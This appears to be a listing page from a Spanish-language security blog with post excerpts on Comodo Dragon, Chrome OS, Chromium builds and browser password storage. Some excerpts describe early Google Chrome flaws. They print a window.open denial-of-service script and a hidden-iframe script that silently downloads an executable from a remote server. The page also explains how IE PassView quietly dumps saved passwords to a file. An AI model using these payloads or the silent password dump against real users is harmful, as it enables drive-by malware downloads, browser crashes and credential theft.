La empresa de seguridad Comodo, famosa por su Antivirus y Firewall, ha creado un navegador llamado Comodo Dragon, pensando totalmente en la seguridad del usuario.
Comodo Dragon esta basado en el navegador Chromium (igual que Google Chrome), pero ademas de las características que ya incluye Chromiun el nuevo navegador seguro de Comodo incluye las siguientes: Leer el resto de la entrada »
Antes de descargar e instalar el nuevos sistema operativo de google, es necesario saber de que se trata el ya famoso Google Chrome OS, les dejo este vídeo donde explican claramente de que se trata:
Ahora que tenemos claro de que se trata Google Chrome OS vamos a instalarlo en nuestro PC, actualmente hay 2 versiones del Google Chrome OS liberadas, una creada por un Jon Ursenbach de GDGT y otra creada por Mark Renouf la versión que utilizaremos para este articulo es la creada por Renouf. Leer el resto de la entrada »
Google ha sacado la build de Google Chromium 4.0 (la versión de desarrollo más experimental de Chrome) para Mac OS X y GNU Linux, la cual se puede descargar y probar, al parecer es realmente rápida y a sorprendido de manera positiva en algunos test como el Acid etc. La combinación del motor de Safari y una gran parte del código procedente de Mozilla unido al indiscutible talento de muchos de los ingenieros y desarrolladores de Google están dando sus frutos poco a poco.
Para descargar Google Chrome o Chromium como se le llamapara Mac OS X y GNU Linux tenemos que entrar a este enlace y seleccionar el directorio correspondiente a nuestro sistema operativo ( chromium-rel-linux/ para los Linux y chromium-rel-mac/ los Mac ) e ir hasta abajo del todo donde se encuentra la última build. Leer el resto de la entrada »
Es común encontrar personas que guardan las contraseñas en su navegador favorito, por comodidad, pereza, etc… pero no toman en cuenta las precauciones que se deben tener a la hora de realizar esta acción, en este pequeño documento se mostrara por que no es apropiado guardar nuestras contraseñas en el navegador web y los diferentes métodos y programas utilizados para recuperar estas.
Empezare por el navegador que domina el mercado, el Internet Explorer, aparte de ser el navegador más inseguro y atacado, es el que peor manejo hace de nuestras contraseñas almacenadas, no tiene ningún gestor para estas, ninguna clave maestra para codificarlas… muchos spyware roban fácilmente esta información con los riesgos para nuestra seguridad que esto implica, además existe una gran cantidad de aplicaciones que permite recuperar fácilmente estas contraseñas almacenadas, vamos a ver una de ellas llamada IE PassView.
El programa es bien simple, no necesita instalación y con solo abrirlo nos muestra en texto plano todas las contraseñas almacenadas en el Internet Explorer, nos da la posibilidad de guardarlas en diferentes formatos, además de esto puede ser llamado desde línea de comandos y con algunos parámetros como /stext nombrearchivo.txt guardará automáticamente todas las claves en un archivo de texto sin que nos demos cuenta, dejando nuestras contraseñas a merced de cualquier persona.
Recomendaciones:
Una vez más el navegador desarrollado por Google, conocido como Chrome, presenta una vulnerabilidad facilmente explotable, esta vez se trata de Memory Exhaustation desde un servidor web remoto, provocando así una denegación de servicio.
Esta vulnerabilidad puede ser fácilmente explotada por un usuario malicioso que publique en su página web el siguiente código:
<script language=”javascript”>
window.open(“\r\n\r\n”);
window.refresh();
window.open(“\r\n\r\n”);
</script>
Y esta web sea visitada utilizando Google Chrome.
El Nuevo Navegador de Google puede ser muy rápido, muy bonito, consumir poca memoria, tener muchas funciones “WoW” pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de exactlimon sobre un nuevo fallo en Google Chrome que permite descargar archivos (de cualquier tipo) sin el consentimiento del usuario.
Este fallo descubierto nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.
<script>
document.write('<iframe src="http://www.dragonjar.org/calc.exe" frameborder="0" width="0" height="0">');
</script>
He subido una prueba de concepto al servidor con la calculadora de windows y haciendo click aquí obtendrás algo parecido a esto.
El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por “curiosidad”, al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal actualizado, han vuelto a promocionarlo en la pagina principal de google.
La version afectada con este y los otros fallos de seguridad mencionados anteriormente en el portal es la 0.2.149.27 les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.
Mas Información:
http://milw0rm.com/exploits/6355
Primera Vulnerabilidad en Google Chrome
Nueva Vulnerabilidad en Google Chrome
Ayer les comentaba sobre la Primera Vulnerabilidad en Google Chrome, hoy Rishi Narang ha descubierto una nueva vulnerabilidad que permite bloquear TODAS las pestañas de el ya famoso Navegador de Google.
El fallo radica en la librería chrome.dll (versión 0.2.149.27) del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de “pestañas independientes” de este navegador (ver imagen). Leer el resto de la entrada »
Comunidad
Laboratorios
c1b3rh4ck
kradjc (kR@d)
alex
d3m4s1@d0v1v0
4v4t4r (4v4t4r)
Alejandro Ramos
belial9826
carlos
diego
Dino
